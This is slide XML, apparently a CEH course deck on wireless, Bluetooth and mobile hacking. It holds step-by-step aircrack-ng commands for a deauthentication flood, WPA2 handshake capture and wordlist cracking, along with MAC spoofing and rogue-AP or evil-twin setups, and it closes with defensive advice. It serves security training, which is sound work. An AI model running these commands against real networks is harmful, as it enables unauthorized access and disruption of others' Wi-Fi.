            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="564" name="Google Shape;564;p92"/>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New to v10. WiFi (802.11), Bluetooth, 3G, 4G, ..</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Fundamentals</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> (topologies, packets contain ssid, ACL, Mac, ..)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Kali needs to see the wifi adaptor, most of the time it is good to have a specific device for this</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Open &lt; ACL &lt; WEP (key management problems, shared key) &lt;  WPA2</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Rogue AP</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>And lots of tools and concepts like war driving</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Be Careful</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t> about “free” wifi</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Google Shape;565;p92"/>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9" name="Shape 569"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="570" name="Google Shape;570;p9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Fundamentals</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571" name="Google Shape;571;p93"/>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Vocabs are huge!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Ad Hoc Mode (peer to peer)</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BSS - Basic service Set</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IBSS: Independent BSS (no other device)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Half Duplex</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Infrastructure Mode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AP. Access Point (Hot Spot)</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BSA. Basic Service Area (cell)</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SSID. Service Set Identifier System</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There is a DS (Distribution System) which connects the wireless connection to other systems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Channels are important. They should not interfere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Controller (WirelessLanController)</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Can push configs to the APs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ESS. Extended Service Set (combination of all AP areas)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Roaming (same SSID on different channels)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Tools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inSSIDer</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="F6F2D2"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>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94"/>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Fundamentals</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="577" name="Google Shape;577;p94"/>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Waves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Frequency 1Hz, 1KHz, 1MHz</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Wavelength (length of one cycle)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Energy (Amplitude or how tall)</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But there will problems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Path loss = free path loss, lead, scattering, reflection, fade, long range atmosphere refraction, multipath, noise,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RSSI: received signal strength identicator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SNR: RSSI - Noise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Frame types: different than 802.3 (ETH) because we should have collision avoidance (instead of collision detection)</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Management (SSID shares beacons)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Control frames w(e send RTS (request to send) and will send we get CTS (clear to send))</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9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Standards and Regulations</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Google Shape;583;p95"/>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Layer 1 and 2: Physical and Data Link</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IEEE working groups create these standards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802.11 (have a look at the website)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Some 3rd parties check device compatibilities by these  standards (say Wifi Alliance)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There also should be regulations on radios! To prevent collision. In US it is FCC, in EU it is ETSI,  In iran سازمان تنظیمات مقررات رادیویی</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pic>
        <p:nvPicPr>
          <p:cNvPr id="584" name="Google Shape;584;p95"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4220010" y="2407425"/>
            <a:ext cx="4513625" cy="193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پنج مرحله حمله</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088600" y="873025"/>
            <a:ext cx="4537500" cy="356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
              <a:t>Reconnaissance (Gathering data)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Passive (google, news)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Active (call &amp; ask, go there, ..)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Scanning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Which port is open</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What OS?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>What device? </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Gain Access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Maintain Access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rootkit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Trojan</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Backdoor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Cover Tracks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ogs</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8" name="Shape 588"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589" name="Google Shape;589;p9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hacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hidden SSIDs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="590" name="Google Shape;590;p96"/>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Hidden SSID Concept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Star wireless monitoring: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airmon-ng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Discover the APs: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airdump-ng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Wait for associations or use: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airreplay-ng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Module 92 of CBT</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97"/>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hacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Mac Filtering</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="596" name="Google Shape;596;p97"/>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MAC Filtering Concept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Find the AP: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airmon-ng &amp; airodump-ng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Find an associated client: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Airodump-ng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Spoof the mac:</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macchanger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Module 93 of CBT</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0" name="Shape 600"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="601" name="Google Shape;601;p98"/>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hacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>WPA2 cracking</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="602" name="Google Shape;602;p98"/>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There is a preshared key (PSK)</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Check wlans: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ifconfig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ip addr show</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airmon-ng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Create the monitoring dev (mon0)</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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irmon-ng start wlan0</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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irmon-ng  # will show it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Collect data</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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irodump-ng mon0 #will show ESSID &amp; MAC</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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irodum-ng -w FILE -c 1 --bssid MAC mon0 #save on chan1 and into file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aireplay-ng -0 0 -a MAC mon0 # </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>infinite</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de auth</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Stop the collection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Crack</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aircrack-ng FILE.cap -w /pentest/passwords/wordlists/darkc0de.lst</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WEP? Is same but only collect ~15K packets and call ‘aircrack-ng FILE’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CBT 94</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6" name="Shape 606"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="607" name="Google Shape;607;p99"/>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hacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Rouge</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Google Shape;608;p99"/>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a</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irbase-ng can make an AP!</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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>chpd3 is a DHCP server!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And we are routing to internet via ETH :D</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="160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Evil Twin is when we are </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>emulating</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> the same WiFi but stronger to some users or doing de-auth</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MITMA</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CBT 95</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2" name="Shape 612"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="613" name="Google Shape;613;p10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hacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Mis-Association Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="614" name="Google Shape;614;p100"/>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Fun attack. The computer is trying to connect to WiFis it knows.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airmon-ng start wlan0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airdump-ng mon0 # wil show new computers PNL (Prefered network list) and we can create the open ones! In this case the BSSID will shown as (not associated)</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a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>irbase-ng --essid “Free WIFI” -c 1 mon0</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8" name="Shape 618"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="619" name="Google Shape;619;p101"/>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Bluetooth</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="620" name="Google Shape;620;p101"/>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Short Range</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> on 2.4GHz and 33 Feet (gens are not part of CEH)</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3 modes: discoverable, limited discoverable (short time), non discoverable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Pairing mode and non-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pairing</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> mode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Antennas will help both in BT and Wifi to stay away from the target.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Attacks like leaking calendars, friend lists, creating problems in </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bluetooth</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> by non standard devices, remotely controlling </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>devices</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and worms.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Bluejacking: writing </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>message</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and then sharing with bluetooth</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Bluesnarfing: getting data from devices, they should have security problems.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Bluetooth honeypot: use the “bluepot” tool</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Tools like ‘btscanner’ can do </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inquiry</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> scan and wait for others. There are 32 channels</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4" name="Shape 624"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="625" name="Google Shape;625;p102"/>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Mobile Attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="626" name="Google Shape;626;p102"/>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Apple</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="F6F2D2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and android</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They are SMART, so they collect data</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Be careful about the apps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Regular attacks like HTTP sniffing, MITM, malware</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0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <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0" name="Shape 630"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="631" name="Google Shape;631;p10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Securing WiFi</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="632" name="Google Shape;632;p103"/>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Wireless Lan Controllers help to do central configs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IDS / IPS which sees rouges (because others are seeints its signals, even with triangulations)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It is possible to have RADIUS to give specific keys to users, and not PSK (802.11i which is WPA2 Enterprise)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Disable SSID &amp; Mac filtering :D</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WEP is off the table!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Use VPN services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User Awareness</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:solidFill>
                <a:srgbClr val="F6F2D2"/>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6" name="Shape 636"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="637" name="Google Shape;637;p104"/>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Mobile Devices</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="638" name="Google Shape;638;p104"/>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In CEH 9</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
